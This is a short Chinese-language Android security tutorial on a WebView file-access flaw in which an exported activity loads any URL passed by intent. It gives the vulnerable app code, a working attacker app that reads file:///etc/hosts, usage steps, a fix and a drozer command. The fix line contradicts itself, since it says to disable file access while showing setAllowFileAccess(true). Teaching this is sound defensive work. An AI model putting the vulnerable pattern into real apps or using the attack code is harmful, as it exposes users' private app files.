webview file域控制不严格读取内部私有文件
必须条件: 1.存在webview的activity组件可导出 2.当前的webview允许使用file协议
可利用app关键代码:
代码语言:javascript复制android:exported="true"//api17及以上版本默认为false
webView.getSettings().setAllowFileAccess(true);//默认是true
MainActivity.java
代码语言:javascript复制public class MainActivity extends AppCompatActivity {
private WebView webView = null;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
// setContentView(R.layout.activity_main);
webView = new WebView(this);
setContentView(webView);
webView.setWebViewClient(new WebViewClient());
webView.getSettings().setAllowFileAccess(true);
Intent mIntent = this.getIntent();
Bundle bundle = mIntent.getBundleExtra("bundle");
String url = bundle.getString("url");
webView.loadUrl(url);
}
}
AndroidManifest.xml
代码语言:javascript复制<activity android:name=".MainActivity" >
<intent-filter>
<action android:name="android.intent.action.MAIN" android:exported="true" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
攻击app关键代码:
MainActivity.java
代码语言:javascript复制
public class MainActivity extends AppCompatActivity {
public static final String LOAD_URL="file:///etc/hosts";
// public static final String BAIDU="https://www.baidu.com";
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
ComponentName componentName = new ComponentName("com.demo.victim","com.demo.victim.MainActivity");
Intent intent = new Intent();
Bundle bundle = new Bundle();
intent.setComponent(componentName);
bundle.putString("url",LOAD_URL);
intent.putExtra("bundle",bundle);
startActivity(intent);
}
}
利用: 先安装可利用app在安装攻击app,在打开攻击app
修复: 设置android:exported=”false” 设置为不可导出 webView.getSettings().setAllowFileAccess(true);明确禁用file协议
工具: 使用drozer查看activity导出
代码语言:javascript复制run app.activity.info -a com.xx.xx
代码: webview